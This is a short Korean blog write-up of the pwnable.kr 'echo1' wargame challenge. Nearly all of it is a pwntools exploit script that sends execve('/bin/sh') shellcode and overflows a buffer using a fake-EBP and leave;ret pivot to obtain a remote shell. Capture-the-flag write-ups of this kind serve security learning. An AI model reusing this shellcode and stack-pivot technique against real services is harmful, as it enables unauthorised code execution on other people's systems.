보호기법이 다 꺼져있다. 가벼운 fake ebp 기법.
Exploit Code
from pwn import *
#p=process('./echo')
p=remote('pwnable.kr', 9010)
leave_ret = 0x4007be
shellcode = '\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05'
o = 0x602098 # -> shellcode_addr
p.sendlineafter(': ', shellcode)
p.sendlineafter('> ', '1')
payload = 'A'*0x20+p64(o-8)+p64(leave_ret)
p.sendlineafter('\n', payload)
p.interactive()Capture the Flag
'Writeup [pwn] > pwnable.kr' 카테고리의 다른 글
| fsb (0) | 2020.03.07 |
|---|---|
| echo2 (0) | 2020.03.07 |
| dragon (0) | 2020.03.07 |
| crypto1 (0) | 2020.03.07 |
| brainfuck (0) | 2020.03.07 |